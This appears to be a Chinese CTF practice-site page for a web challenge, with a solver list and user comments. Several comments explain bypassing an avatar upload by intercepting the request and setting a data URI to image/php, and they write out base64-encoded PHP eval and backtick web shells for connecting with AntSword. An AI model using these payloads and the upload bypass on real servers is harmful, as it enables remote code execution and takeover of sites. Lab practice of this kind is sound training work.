评分(12)
解题动态
gdrhdr 攻破了该题 17小时前
wuyong5025 攻破了该题 2天前
46963009 攻破了该题 2天前
hulihaha 攻破了该题 2天前
psx900910 攻破了该题 3天前
Kakivare 攻破了该题 5天前
iElloc 攻破了该题 5天前
suxiansheng 攻破了该题 6天前
yang0000 攻破了该题 8天前
掘金 攻破了该题 11天前
0n1y 攻破了该题 13天前
Tomato薯条 攻破了该题 15天前
admincon 攻破了该题 17天前
yinlin 攻破了该题 18天前
thexx 攻破了该题 18天前
wbq012 攻破了该题 19天前
凡尘桔子 攻破了该题 19天前
cxller 攻破了该题 20天前
微笑刺客 攻破了该题 20天前
评论
微笑刺客 20天前
举报
上传一张正常图片,提交时候BP截包,内容改为data:image/php;base64,PD9waHAgZXZhbCgkX1BPU1RbImNtZCJdKTs/Pg==(base64后得结果),工具直连,拿flag
言寺介 4月前
举报
先上传正常图片,不然一直转圈圈,然后抓包修改图片data%3Aimage%2Fphp%3Bbase64%2C后面接一句话木马base64加密,然后蚁剑
ixin 6月前
举报
image=data%3aimage%2fphp%3bbase64%2cIDw%2fcGhwIGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4%3d
zhuizhui 11月前
举报
在post body构造一句话木马 image=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg== url 解码后即为 image=data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg==
llc123 1年前
举报
thinkphp v5.1.35 lts和xss不知道有没有操作空间
LoadOverload 1年前
举报
用webacoo亦可解决
Zhumeng 1年前
举报
注册账号登录用户会有个头像上传上传一个正常的头像发现被base64编码了,我们将一句话木马进行编码编码后上传将mime类型改成image/php
zhuohao 1年前
举报
蚁剑一直返回数据为空 一直连不上
hackhui 1年前
举报
一句话木马传参加''
LLTVLL 1年前
举报
一句话用这个 <?php eval($_POST['cmd']);?>,好像网上找的有的有问题
BlueL1ght 2年前
举报
<?php echo `$_POST[a]`;?>